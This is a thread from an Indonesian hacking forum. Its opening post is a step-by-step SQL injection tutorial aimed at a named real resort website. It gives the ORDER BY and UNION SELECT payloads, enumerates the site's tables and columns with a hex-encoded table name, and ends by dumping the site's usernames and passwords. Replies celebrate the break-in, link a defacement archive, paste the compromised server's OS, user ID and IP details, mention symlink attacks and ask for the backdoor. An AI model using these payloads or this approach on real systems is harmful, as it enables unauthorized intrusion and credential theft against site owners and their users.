Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-22-2013, 12:49 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
1 2 3 4 5 54 Next »

[Tutor] SQL Injection For Newbie (Share Di Mari)

Home General Computer Multimedia Business Lounge

Pages (6): 1 2 3 4 5 6 Next »
Post Reply 
Tweet
Threaded Mode | Linear Mode
Tutor SQL Injection For Newbie (Share Di Mari)
12-29-2011, 06:27 PM
Post: #1
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
SQL Injection For Newbie (Share Di Mari)
selamat sore teman-teman DC

ane mau ngelanjutin thread ane yng tadi subuh udah di close sama admin DC karena menyimpang dari rule DC piss
sebelumnya ane minta maaf ya tentang thread ane yang itu piss

okeh di mulai aja dah
ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane) piss , untuk para dewa (dewa19 kaleee ketawa) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).

sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn)

RULE:
1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar ketawa) kalo bertanya bebas
2. Harus jelas dalam bertanya dan memberikan tutorial
3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol

kalo beitu langsung aja deh, sekarang ane duluan

Code:
target : www.canseburesort.co.id

dari alamt website ini terdapat celah Sqli,

Code:
www.canseburesort.co.id/?id_page=6&id_berita=15
[Image: 6schhh.jpg]
seperti biasa untuk mengecek apa itu vuln terhadap SQLI kita uji coba pake single quote '
Code:
www.canseburesort.co.id/?id_page=6&id_berita=15'
[Image: 2zgddom.jpg]
yoman ternyata ini benar ada pesan error itu..
di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by
Code:
id_berita=-15 order by 1--
id_berita=-15 order by 2--
id_berita=-15 order by 3--
id_berita=-15 order by 4--
|
|sampai
|
id_berita=-15 order by 9--

berikut gambar ketika menggunakan
Code:
id_berita=-15 order by 1--
[Image: 35lrx35.jpg]
dan ini ketika kita menggunakan
Code:
id_berita=-15 order by 9--
[spoiler][Image: 35krj8w.jpg]
okeh sekarang kita udah dapet jumlah kolomnya, jumlah kolom = 8 karena pas kita lagi cek di order by 9 keluar error itu berarti jumlah kolomnya ada 8 tapi kalo sewaktu-waktu kita menggunakan order by 9 (n) berarti jumlah kolomnya di kurang satu, ini untuk contoh kasus yang kaya ane ya, karena ngga semua sama tergantung dari pesan error yang di keluarin (sok tau banget ketawa)

lanjut...
setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number

Code:
id_berita=-15 union all select 1,2,3,4,5,6,7,8--
angka-angka itu tergantung jumlah kolom ya
[Image: 1zbxpo8.jpg]
the magic numbers = 3,4,5
dari angka itu kita bakalan dapet informasi sepert:
versi : version()
user : user()
database : database()
nama tabel : table_name
nama kolom : column_name
dll

okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8--
ane pake magic number 5
[Image: t8rvoy.jpg]
lanjut lagi kita pengen tau ada tabel apa aja ya
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--
ane pake magic number 5
[Image: 16hlrog.jpg]
kita dapetin tuh nama tablenya:
Quote:additional_menu,
adm_page,
ads_banner,
amazing_camp,
artikel,
banner,
client_category,
client_image,
galery,
galery_category,
lib_news,
lib_page,
lib_promo,
menu_child,
nav_menu,
news,
price_room,
promotion,
room_galery,
user_account

ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa ketawa)

sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :
Code:
user_account = 0x757365725f6163636f756e74
maka jadi seperti ini
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name= 0x757365725f6163636f756e74--
ane pake magic number 5

[Image: 1zwc3ee.jpg]
ngakak dapet juga tuh, sekarang kita liat password sama usernamenya
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account--
ane pake magic number 5

[Image: r0doah.jpg]
akhirnya kita udah dapet itu username sma passwordnya ketawa
kalo beruntung kita bisa decrypt itu username sama password ketawa tapi kalo ngga bisa ya pasrah mewek
demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam hal penulisannya...

semoga membantu para daun muda DC ketawa (amin)
di tunggu hasil kreasi kalian semuanya..
jangan lupa di cendolin yak... ketawa

----Terima Kasih DC----
Find all posts by this user
Quote this message in a reply
 Reputed by :  ketek(+2) , lionel(+1) , oootrxooo(+1)
12-29-2011, 06:34 PM (This post was last modified: 12-29-2011 06:35 PM by ohara_inamiji.)
Post: #2
ohara_inamiji Offline
^^"
**
Moderators
Posts: 761
Joined: Jun 2011
Reputation: 46
RE: SQL Injection For Newbie (Share Di Mari)
sedikit saran dari ane...
ketawa
kalo mau nyoba sqli pastiin dulu ada halaman admin nya...
karena walau di inject gak ketemu halaman admin nya bisa bikin frustasi...
ketawa
Visit this user's website Find all posts by this user
Quote this message in a reply
12-29-2011, 06:38 PM
Post: #3
rusuh Away
sepik'ers
**
Moderators
Posts: 455
Joined: Oct 2011
Reputation: 77
RE: SQL Injection For Newbie (Share Di Mari)
nice share bang mantap
tapi kalau ane pribadi pentest ke website luar aja bang sebagai contoh peace
Visit this user's website Find all posts by this user
Quote this message in a reply
12-29-2011, 06:39 PM (This post was last modified: 12-29-2011 06:41 PM by cangcimen.)
Post: #4
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 06:34 PM)ohara_inamiji Wrote:  sedikit saran dari ane...
ketawa
kalo mau nyoba sqli pastiin dulu ada halaman admin nya...
karena walau di inject gak ketemu halaman admin nya bisa bikin frustasi...
ketawa
ketawa namanya juga ngga sengaja lewat, terus nemu deh, ketawa
tengkyu sarannya...
ketawa

(12-29-2011 06:38 PM)rusuh Wrote:  nice share bang mantap
tapi kalau ane pribadi pentest ke website luar aja bang sebagai contoh peace

iye om,, ane ngga sengaja juga sih ketawa ane kan bukan heker ngakak
Find all posts by this user
Quote this message in a reply
12-29-2011, 07:08 PM
Post: #5
xil0n9 Offline
DC Senior
***
Posts: 50
Joined: Dec 2009
Reputation: 8
RE: SQL Injection For Newbie (Share Di Mari)
ngono iku lo yo opo seh carane ?
Find all posts by this user
Quote this message in a reply
12-29-2011, 07:40 PM (This post was last modified: 12-29-2011 07:44 PM by rusuh.)
Post: #6
rusuh Away
sepik'ers
**
Moderators
Posts: 455
Joined: Oct 2011
Reputation: 77
RE: SQL Injection For Newbie (Share Di Mari)
http://www.zone-h.org/archive/ip=116.90.165.138
habis suram
pantang dapet sela langsung kena symlink suram

Quote:OS : Linux indo7.liveserver.info 2.6.18-238.el5 #1 SMP Thu Jan 13 15:51:15 EST 2011 x86_64
User ID : uid=673(cansebur) gid=671(cansebur) groups=671(cansebur)
Server IP : 116.90.165.138 - Your IP : 203.211.134.185
Freespace : 278.1 GB of 376.35 GB (73.89%)

suram
Visit this user's website Find all posts by this user
Quote this message in a reply
12-29-2011, 08:16 PM
Post: #7
CyberKaze Offline
./Devilz Advisor
Posts: 869
Joined: Jul 2011
Reputation: 13
RE: SQL Injection For Newbie (Share Di Mari)
mantep omz.. ane ngati ampe situ caraya hmm
Visit this user's website Find all posts by this user
Quote this message in a reply
12-29-2011, 08:20 PM
Post: #8
schumbag Offline
nothing special about me
***
Posts: 800
Joined: Jan 2010
Reputation: 51
RE: SQL Injection For Newbie (Share Di Mari)
keren kaget ane minta backdoor nya ajah lah piss
Find all posts by this user
Quote this message in a reply
12-29-2011, 09:32 PM
Post: #9
cangcimen Offline
./Devilz Advisor
Posts: 539
Joined: Sep 2010
Reputation: 42
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 07:40 PM)rusuh Wrote:  http://www.zone-h.org/archive/ip=116.90.165.138
habis suram
pantang dapet sela langsung kena symlink suram

Quote:OS : Linux indo7.liveserver.info 2.6.18-238.el5 #1 SMP Thu Jan 13 15:51:15 EST 2011 x86_64
User ID : uid=673(cansebur) gid=671(cansebur) groups=671(cansebur)
Server IP : 116.90.165.138 - Your IP : 203.211.134.185
Freespace : 278.1 GB of 376.35 GB (73.89%)

suram

mantap om.. mantap
Find all posts by this user
Quote this message in a reply
12-29-2011, 10:00 PM
Post: #10
eidelweiss Offline
Devilzc0der
*****
DC Security Grup
Posts: 1,536
Joined: Mar 2010
Reputation: 69
RE: SQL Injection For Newbie (Share Di Mari)
(12-29-2011 06:27 PM)cangcimen Wrote:  selamat sore teman-teman DC

ane mau ngelanjutin thread ane yng tadi subuh udah di close sama admin DC karena menyimpang dari rule DC piss
sebelumnya ane minta maaf ya tentang thread ane yang itu piss

okeh di mulai aja dah
ane bikin thread kali ini buat para calon-calon hacker muda yang baru tau dan pengen mendalami tentang SQl injection ( gaya banget ya ane) piss , untuk para dewa (dewa19 kaleee ketawa) ngga usah liat juga gpp, tapi alangkah baiknya bisa menasehati dan menyarankan untuk daun muda (kaya ane).

sebenernya udah ada thread yang kaya begini, tapi ane mencoba merefresh aja lagi, semoga diijin kan sama om dewa-dewa (amiinnn)

RULE:
1. Harus pake gambar untuk memberikan tutorial(biar para daun muda bisa belajar ketawa) kalo bertanya bebas
2. Harus jelas dalam bertanya dan memberikan tutorial
3. Kalo post itu memang bermanfaat buat kalian yg pembaca alangkah baiknya di berikan cendol

kalo beitu langsung aja deh, sekarang ane duluan

Code:
target : www.canseburesort.co.id

dari alamt website ini terdapat celah Sqli,

Code:
www.canseburesort.co.id/?id_page=6&id_berita=15
[Image: 6schhh.jpg]
seperti biasa untuk mengecek apa itu vuln terhadap SQLI kita uji coba pake single quote '
Code:
www.canseburesort.co.id/?id_page=6&id_berita=15'
[Image: 2zgddom.jpg]
yoman ternyata ini benar ada pesan error itu..
di lanjut kalo gitu, untuk mengecek berapa jumpaj kolom kita menggunakan order by
Code:
id_berita=-15 order by 1--
id_berita=-15 order by 2--
id_berita=-15 order by 3--
id_berita=-15 order by 4--
|
|sampai
|
id_berita=-15 order by 9--

berikut gambar ketika menggunakan
Code:
id_berita=-15 order by 1--
[Image: 35lrx35.jpg]
dan ini ketika kita menggunakan
Code:
id_berita=-15 order by 9--
[spoiler][Image: 35krj8w.jpg]
okeh sekarang kita udah dapet jumlah kolomnya, jumlah kolom = 8 karena pas kita lagi cek di order by 9 keluar error itu berarti jumlah kolomnya ada 8 tapi kalo sewaktu-waktu kita menggunakan order by 9 (n) berarti jumlah kolomnya di kurang satu, ini untuk contoh kasus yang kaya ane ya, karena ngga semua sama tergantung dari pesan error yang di keluarin (sok tau banget ketawa)

lanjut...
setelah kita dapet jumlah kolom kita menggunakan perintah union untuk mendapat kan the magic number

Code:
id_berita=-15 union all select 1,2,3,4,5,6,7,8--
angka-angka itu tergantung jumlah kolom ya
[Image: 1zbxpo8.jpg]
the magic numbers = 3,4,5
dari angka itu kita bakalan dapet informasi sepert:
versi : version()
user : user()
database : database()
nama tabel : table_name
nama kolom : column_name
dll

okeh di lanjut ya, sekarang kita pengen tau versi berapa dan apa nama databasenya
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(version(),database()),6,7,8--
ane pake magic number 5
[Image: t8rvoy.jpg]
lanjut lagi kita pengen tau ada tabel apa aja ya
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema=database()--
ane pake magic number 5
[Image: 16hlrog.jpg]
kita dapetin tuh nama tablenya:
Quote:additional_menu,
adm_page,
ads_banner,
amazing_camp,
artikel,
banner,
client_category,
client_image,
galery,
galery_category,
lib_news,
lib_page,
lib_promo,
menu_child,
nav_menu,
news,
price_room,
promotion,
room_galery,
user_account

ini dia yg kita cari-cari dari nama-nama tabel di atas ane pilih yang user_account karena kelihatannya menyimpan akses buat login (mudah-mudahan bisa ketawa)

sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :
Code:
user_account = 0x757365725f6163636f756e74
maka jadi seperti ini
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name= 0x757365725f6163636f756e74--
ane pake magic number 5

[Image: 1zwc3ee.jpg]
ngakak dapet juga tuh, sekarang kita liat password sama usernamenya
Code:
id_berita=-15 union all select 1,2,3,4,group_concat(username,0x3a,password),6,7,8 from user_account--
ane pake magic number 5

[Image: r0doah.jpg]
akhirnya kita udah dapet itu username sma passwordnya ketawa
kalo beruntung kita bisa decrypt itu username sama password ketawa tapi kalo ngga bisa ya pasrah mewek
demikian penjelasan dari ane, terimakasih atas perhatiannya dan juga ane minta maaf kalo banyak kekurangan dalam memberikan tutor dan dalam hal penulisannya...

semoga membantu para daun muda DC ketawa (amin)
di tunggu hasil kreasi kalian semuanya..
jangan lupa di cendolin yak... ketawa

----Terima Kasih DC----

om bisa di jelasin nggak pada bagian ini

Quote:sebelum kita mendapatkan nama kolom kita harus mengganti nama tabel user_account dalam bentuk hex :
Code:
user_account = 0x757365725f6163636f756e74

kenapa harus di ubah or di hex terlebih dahulu ? kenapa gk lgsg aja atau klw pun harus di encrpyt kenapa harus dalam bentuk hexa kenapa nggak md5 base64 r00t13 or sha-1 or yg lain ?

malu
Visit this user's website Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Pages (6): 1 2 3 4 5 6 Next »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Solved] sql injection belajarcarding 11 239 05-10-2013 11:22 AM
Last Post: -=[A][R][I]=-
  [share] kumpulan shell indo dan top_100_shell 777r 25 1,140 04-21-2013 02:09 PM
Last Post: I'van
  [Tutor] SQL injection di globaltv.co.id Exsposed wenkhairu 36 2,318 04-20-2013 03:27 PM
Last Post: fachrycanthropuS
Thumbs Up [Tutor] Remote Command Excute Ala newbie Regel 6 220 03-27-2013 04:35 PM
Last Post: abuabu_hat10
Thumbs Down [Tutor] Pepesan palsu :ngakak (newbie abis lah pokoknya) beg3nk newb1e 18 724 03-25-2013 10:21 AM
Last Post: lanionk
  SQL Injection "detail_prod" server luxembourg [dc]zombierss[dc] 30 469 03-17-2013 11:41 AM
Last Post: Rifaldi238
  [Share] SQLi Scanner - di Jamin Maknyuss RizaL.eN 11 484 03-09-2013 03:13 PM
Last Post: jawaklagi
  List Cheat Blind SQL Injection (Mysql) devilz666 7 345 03-09-2013 02:23 PM
Last Post: jawaklagi
  [Tutor] Sql Injection into outfile [tambahan] KotoM 23 836 02-23-2013 10:52 PM
Last Post: soulheaven
  Sql-map 0.9 Mysql Injection Guide wenkhairu 29 1,868 12-28-2012 01:56 PM
Last Post: bazrezs

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-22-2013, 12:49 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE